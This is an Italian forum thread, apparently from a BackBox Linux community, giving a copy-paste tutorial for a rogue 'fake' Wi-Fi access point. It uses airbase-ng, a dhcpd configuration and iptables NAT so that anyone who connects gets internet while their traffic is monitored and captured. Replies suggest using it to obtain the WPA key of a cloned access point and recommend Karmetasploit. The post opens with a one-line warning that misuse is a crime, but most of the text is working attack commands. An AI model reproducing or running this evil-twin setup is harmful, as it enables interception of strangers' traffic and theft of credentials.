NB, questo tutorial se usato come trappola per ignari o' per queache scopo malefico, e' considerato " CRIMINE".

Ciao tutti
Vi faccio vedere come si fa' un Access Point con internet attivato.

Dimostrazione:

i passi sono:
* configurare il dhcpd.conf
*iniziare il AP falso con airbase-ng
*configurare IP tables per avere internet
*monitorare e catturare il traffico internet.

i tools necessarii:
> Backbox Linux
> scheda wifi esterna (usb)per creare una connessione internet su wlan1
e un getaway 192.168.1.1
> wireless card interna nel mio laptop che usero come AP falso. wlan0


Prima bisogna configurare il dhcpd.conf file.

Apri la console e scrivi:

nano /etc/dhcp3/dhcpd.conf ( ENTER )

*** copia il seguente nella console:

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 4.2.2.2;
range 192.168.2.130 192.168.2.140;
}

*** Premi Ctrl + X ---> Y --> ENTER per salvare il tutto.

*** Ora per iniziare il AP falso con airbase-ng devi mettere la tua carta in monitor ( ricordati ,questa e' la tua carta interna wlan0)

airmon-ng
airmon-ng start wlan0
airbase-ng -e "GHOSTDOG" -c 9 mon0

** Questo crera' una interface ( ath0 ) non criptata sul canale 9 che chiamero' GHOSTDOG ( tu chiamala quello che vuoi).

*** ora apri la console e scrivi:

airbase-ng -e "GHOSTDOG" -c 9 mon0

*** il sistema rispondera':
20:54:01 Create tap interface ath0
20:54:01 Trying to set MTU on ath0 to 1500
20:54:01 Trying to set MTU on mon0 to 1800
20:54:01 Access Point with BSSID 00:242:A1:40:8E started

*** adesso deve assegnare un subnet e un getaway;
apri la console e scrivi:

ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

*** Ora devi comiciare il DHCP, nella stessa console scrivi:

mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

*** adesso devi creare gli IP tables per filtrare il traffico su ath0 verso internet. ( la tua wireless card wlan1 deve essere connessa a internet)
*** apri la console e scrivi:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1

@@@@@@@@@ Complimenti, ora hai generate un AP falso che chiunque potrebbe connettersi a te e avere internet @@@@@@@@@@@@@@@@@@@@@

Happy Hacking

GD

Ciao

Si certamente si puoi fare uno script che automatizza il tutto, anche se basta copiare la guida su un Documento e poi quando serve, basta fare copy and paste nel terminal.
E' sicuramente un ottimo modo per scoprire la WPA del access point clonato.
Fammi saper, io posso scarabocchiare qualcosa poi te la passo se vuoi.

GD

ciao, certo passamela, mi farebbe piacere testarla........

Segnalo questo tutorial:
http://www.metasploit.com/redmine/projects/framework/wiki/Karmetasploit

Se qualcuno si prende la briga di testare il tutto su BackBox inseriremo howto e video sul sito.